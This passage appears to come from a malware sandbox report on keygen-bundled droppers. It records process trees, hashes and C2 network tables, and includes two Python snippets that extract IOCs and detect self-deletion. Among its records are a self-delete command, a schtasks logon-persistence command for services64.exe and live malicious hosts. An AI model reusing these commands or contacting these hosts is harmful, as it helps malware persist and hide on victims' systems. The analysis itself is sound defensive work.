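    The protocol is located by value rather than by column: the Domain cell is
    empty for direct-to-IP rows and some extractions shift 'tcp' into it.
    """
    cells = [c.strip() for c in row.strip().strip("|").split("|")]
    if len(cells) < 3:
        return None
    proto = next((c for c in cells[2:] if c.lower() in ("tcp", "udp")), None)
    domain = next((c for c in cells[2:] if c and c.lower() not in ("tcp", "udp")), "")
    m = ENDPOINT_RE.match(cells[1])
    if not proto or not m:
        return None          # header row, or something that is not ip:port
    return {"country": cells[0], "ip": m.group(1), "port": int(m.group(2)),
            "domain": domain.lower(), "proto": proto.lower()}


def summarize(rows):
    """Bucket the rows into DNS queries, reverse lookups, background noise and real connections."""
    out = {"dns": Counter(), "connections": Counter(), "reverse_lookups": 0, "benign": 0}
    for r in filter(None, map(parse_row, rows)):
        if r["proto"] == "udp" and f"{r['ip']}:{r['port']}" == RESOLVER:
            if r["domain"].endswith(".in-addr.arpa"):
                out["reverse_lookups"] += 1
            elif r["domain"] in BENIGN:
                out["benign"] += 1
            else:
                out["dns"][r["domain"]] += 1
            continue
        if r["domain"] in BENIGN:
            out["benign"] += 1
            continue
        out["connections"][(r["ip"], r["port"], r["domain"])] += 1
    return out


def tag(indicator):
    """Coarse label so shared services are not blocked wholesale by domain."""
    if indicator in SHARED_HOSTING:
        return "shared-hosting"
    if indicator in IP_LOOKUP:
        return "ip-lookup"
    return "candidate"


def iocs(summary):
    """Deduplicated indicators with hit counts; names that resolved but never connected are kept as dns-only."""
    seen = defaultdict(int)
    for (ip, port, domain), n in summary["connections"].items():
        seen[(domain or ip, f"{ip}:{port}")] += n
    for domain, n in summary["dns"].items():
        if not any(d == domain for d, _ in seen):
            seen[(domain, "dns-only")] += n
    return sorted(({"indicator": d, "endpoint": e, "hits": n, "tag": tag(d)}
                   for (d, e), n in seen.items()),
                  key=lambda x: (-x["hits"], x["indicator"]))


if __name__ == "__main__":
    for item in iocs(summarize(NETWORK_ROWS)):
        print(item)
```

Names that were resolved but never connected to (qwertys.info, staticimg.youtuuee.com and remotenetwork.xyz in this subset) surface as `dns-only`; in this detonation the first two are polled for the whole run without a TCP session following, which is exactly the shape of a dead or sinkholed C2 and is still worth a resolver-level block. The UA address with no domain is the top hit because it is contacted directly by IP.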
Files
memory/1016-0-0x0000000074F9E000-0x0000000074F9F000-memory.dmp
memory/1016-1-0x00000000009A0000-0x0000000000B76000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
| MD5 | 4b0d49f7c8712d7a0d44306309f2e962 |
| SHA1 | 5f0a2536f215babccf860c7ccdeaf7055bb59cad |
| SHA256 | f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60 |
| SHA512 | 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b |
memory/4068-13-0x00007FFCC7303000-0x00007FFCC7305000-memory.dmp
memory/4068-15-0x0000000000840000-0x0000000000850000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
| MD5 | 13e802bd360e44591d7d23036ce1fd33 |
| SHA1 | 091a58503734848a4716382862526859299ef345 |
| SHA256 | e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b |
| SHA512 | 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b |
C:\Users\Admin\AppData\Local\Temp\2.exe
| MD5 | a5bace3c3c2fa1cb766775746a046594 |
| SHA1 | 9998cad5ba39e0be94347fcd2a2affd0c0a25930 |
| SHA256 | 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6 |
| SHA512 | 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184 |
memory/3412-39-0x00000000004F0000-0x00000000004F8000-memory.dmp
memory/1696-38-0x0000000000DE0000-0x0000000000E00000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 0ebb4afbb726f3ca17896a0274b78290 |
| SHA1 | b543a593cfa0cc84b6af0457ccdc27c1b42ea622 |
| SHA256 | 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2 |
| SHA512 | 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11 |
memory/1696-45-0x00000000016A0000-0x00000000016BA000-memory.dmp
memory/1696-49-0x00007FFCC7300000-0x00007FFCC7DC1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
| MD5 | f9be28007149d38c6ccb7a7ab1fcf7e5 |
| SHA1 | eba6ac68efa579c97da96494cde7ce063579d168 |
| SHA256 | 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914 |
| SHA512 | 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171 |
memory/1696-60-0x00007FFCC7300000-0x00007FFCC7DC1000-memory.dmp
memory/4068-61-0x00007FFCC7303000-0x00007FFCC7305000-memory.dmp
memory/2264-62-0x0000000000400000-0x0000000002B59000-memory.dmp
memory/4068-65-0x00000000011F0000-0x00000000011FE000-memory.dmp
memory/4068-66-0x0000000001240000-0x0000000001252000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 9910203407b2605107587e954081c575 |
| SHA1 | 8037bfb3b779fbbb3273df4f5c63d15b9589ce95 |
| SHA256 | 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49 |
| SHA512 | ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be |
memory/3696-96-0x0000000000B90000-0x0000000000B96000-memory.dmp
memory/5048-98-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-101-0x00000000029B0000-0x00000000029D0000-memory.dmp
memory/5048-100-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-104-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-105-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-103-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-102-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-106-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-107-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-109-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-110-0x0000000140000000-0x0000000140786000-memory.dmp
memory/5048-116-0x0000000140000000-0x0000000140786000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240903-en
Max time kernel
121s
Max time network
123s
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2648 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2648 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2648 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2648 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2724 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 2724 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 2724 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
| PID 2724 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
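Added example (not part of the report): checking the cmd.exe line above for the delay-then-delete idiom and confirming, from the WriteProcessMemory rows, that the file being deleted is the image of the process that spawned the shell, which is what "Deletes itself" means here. The process and signature rows are copied from this report as constructed input; the timeout and choice variants in the delay pattern and the del switches are the example's own generalisation beyond the ping form seen on this page.

```python
import re

# Constructed input: the behavioral17 process rows above (image, then command line).
PROCESSES = r'''
C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
'''.strip().splitlines()

# Two of the "Suspicious use of WriteProcessMemory" rows above; the report
# repeats each one, which is harmless for the parent map built below.
WRITE_ROWS = [
    r"| PID 2648 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe | C:\Windows\SysWOW64\cmd.exe |",
    r"| PID 2724 wrote to memory of 2552 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\PING.EXE |",
]

# A delay primitive (ping, timeout, choice) that gives the parent time to exit
# so its image is no longer locked, followed by a del of some path.
DELAY_RE = re.compile(r"\b(ping(?:\s+-n\s+\d+)?\s+\S+|timeout(?:\s+/t)?\s+\d+|choice\b[^&]*)", re.I)
DELETE_RE = re.compile(r"\bdel\b(?:\s+/[a-z])*\s+\"?([^\"&>]+?)\"?(?=\s*(?:>|&|$))", re.I)


def parse_self_delete(cmdline):
    """Return {'delay', 'target'} when a command line waits and then deletes a file, else None."""
    delay = DELAY_RE.search(cmdline)
    delete = DELETE_RE.search(cmdline)
    if not (delay and delete and delay.start() < delete.start()):
        return None
    return {"delay": delay.group(1).strip(), "target": delete.group(1).strip()}


def parse_write_row(row):
    """'| PID A wrote to memory of B | N/A | parent | child |' -> (parent, child), else None."""
    cells = [c.strip() for c in row.strip().strip("|").split("|")]
    m = re.match(r"PID (\d+) wrote to memory of (\d+)", cells[0])
    return (cells[2], cells[3]) if m else None


def find_self_deletion(process_lines, write_rows):
    """Flag delete commands and say whether the target is the image of the shell's parent."""
    parents = dict(p[::-1] for p in filter(None, map(parse_write_row, write_rows)))  # child -> parent
    findings = []
    for image, cmdline in zip(process_lines[0::2], process_lines[1::2]):
        hit = parse_self_delete(cmdline)
        if not hit:
            continue
        parent = parents.get(image)
        hit.update(image=image, parent=parent,
                   deletes_parent=bool(parent) and parent.lower() == hit["target"].lower())
        findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in find_self_deletion(PROCESSES, WRITE_ROWS):
        print(finding)
```

The parent map comes from the WriteProcessMemory rows because CreateProcess-with-inheritance shows up in this report as the parent writing into the child before it starts; on an EDR you would use the real parent PID instead. The `ping 127.0.0.1` child on its own is not a finding, which is why the loop reports one hit for this detonation.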
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.187.227:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 195.200.9.102:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| GB | 91.108.103.86:443 | evaexpand.com | tcp |
| US | 8.8.8.8:53 | evaexpand.com | udp |
Files
memory/2648-0-0x00000000000F0000-0x0000000000108000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
138s
Command Line
Signatures
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\winnetdriv.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2164 wrote to memory of 4756 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2164 wrote to memory of 4756 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
| PID 2164 wrote to memory of 4756 | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe | C:\Windows\winnetdriv.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731243708 0
Network
Files
memory/2164-0-0x0000000000400000-0x00000000004E5000-memory.dmp
memory/4756-12-0x0000000000D60000-0x0000000000E45000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 265cadde82b0c66dc39ad2d9ee800754 |
| SHA1 | 2e9604eade6951d5a5b4a44bee1281e32166f395 |
| SHA256 | 40fd6a0b671a0e5074a206201f57f7731a0d01baab5874b28a9b0f019a451c5a |
| SHA512 | c99f3a5464e1ac02402814401c2cb66a9fafb794356395c1081bdf3c4c3534086498c19efe4055780a52a1bb80db81658c2cb4af5271015af51edf7bd3865e7b |
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-10 13:01
Reported
2024-11-10 13:04
Platform
win7-20240903-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
OnlyLogger
Onlylogger family
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jhuuee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\chrome3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4\PBrowFile28.exe"
C:\Users\Admin\AppData\Local\Temp\chrome3.exe
"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe"
C:\Users\Admin\AppData\Local\Temp\2.exe
"C:\Users\Admin\AppData\Local\Temp\2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
Network
Files
memory/1552-0-0x000000007490E000-0x000000007490F000-memory.dmp
memory/1552-1-0x0000000000230000-0x0000000000406000-memory.dmp
\Users\Admin\AppData\Local\Temp\chrome3.exe
| MD5 | 4b0d49f7c8712d7a0d44306309f2e962 |
| SHA1 | 5f0a2536f215babccf860c7ccdeaf7055bb59cad |
| SHA256 | f996915ce7203dc3661afa686637426fab14c91682ada02054d2f64ce245af60 |
| SHA512 | 50dc00bebdafdc2cc1792a45cab5f13773ff0026c20618eec29f50000261afba65f58cec5d30be0fd5aaea17cac30b97b16be70c6f430987cd10a8488948ee2b |
\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
| MD5 | 13e802bd360e44591d7d23036ce1fd33 |
| SHA1 | 091a58503734848a4716382862526859299ef345 |
| SHA256 | e24c3eda7673062c9b243a09bc91e608f4d9dcc5de27db025b5ad150ae014f2b |
| SHA512 | 8bb52a3b0852cc345be7d4b50b19c3778bcae5cb7ee654aced93772bee6fd22d1e87c484d91afb10af040d7c52b0f1e0b60de47a28d8eeea5e3c6afcead6163b |
\Users\Admin\AppData\Local\Temp\2.exe
| MD5 | a5bace3c3c2fa1cb766775746a046594 |
| SHA1 | 9998cad5ba39e0be94347fcd2a2affd0c0a25930 |
| SHA256 | 617de4cdc27fb67b299a0d95ff2129d0ea2488040bcfd5f64868a0fab33af7a6 |
| SHA512 | 66f0cb5b820014a8d73bab706de8138d22a4d690d77726ac53b785daf99ed45646c8b0236bf10e209039f78324a63c3ee1c2f7ccf852fa7d579753cb9f659184 |
\Users\Admin\AppData\Local\Temp\setup.exe
| MD5 | 0ebb4afbb726f3ca17896a0274b78290 |
| SHA1 | b543a593cfa0cc84b6af0457ccdc27c1b42ea622 |
| SHA256 | 2fd099e9c096efb59756565d50243387d7669d60c2088e842f1f5d9ef297b6d2 |
| SHA512 | 284063f08667af11bc593dcb88f19d2bc6b9fd1e2edf368fdc78f07c9956fa3078673ee7dd7ca349e32cb1f848edfeab3b6a758eac5e5c3d36dc1a8764353d11 |
memory/2972-26-0x0000000000200000-0x0000000000208000-memory.dmp
memory/2812-25-0x0000000001300000-0x0000000001320000-memory.dmp
memory/2816-24-0x000000013FE70000-0x000000013FE80000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
| MD5 | f9be28007149d38c6ccb7a7ab1fcf7e5 |
| SHA1 | eba6ac68efa579c97da96494cde7ce063579d168 |
| SHA256 | 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914 |
| SHA512 | 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171 |
memory/2812-39-0x0000000000140000-0x000000000015A000-memory.dmp
memory/2868-40-0x0000000000400000-0x0000000002B59000-memory.dmp
memory/2816-43-0x0000000000560000-0x000000000056E000-memory.dmp
memory/876-50-0x000000013F550000-0x000000013F560000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 9910203407b2605107587e954081c575 |
| SHA1 | 8037bfb3b779fbbb3273df4f5c63d15b9589ce95 |
| SHA256 | 07b00c604d6473439dcd16b47cbefa450aad400871cb2215f0814547aca81b49 |
| SHA512 | ba2c532d16eb259ae1621ac6ab668b4da28b2a842cb7320eee11982e2b835979c1ec6c566e3207e798fd2d0767070a568d2cd32dbb19200572afb2c7b32a68be |
memory/1980-61-0x000000013FA30000-0x000000013FA36000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabFCF7.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarFD38.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
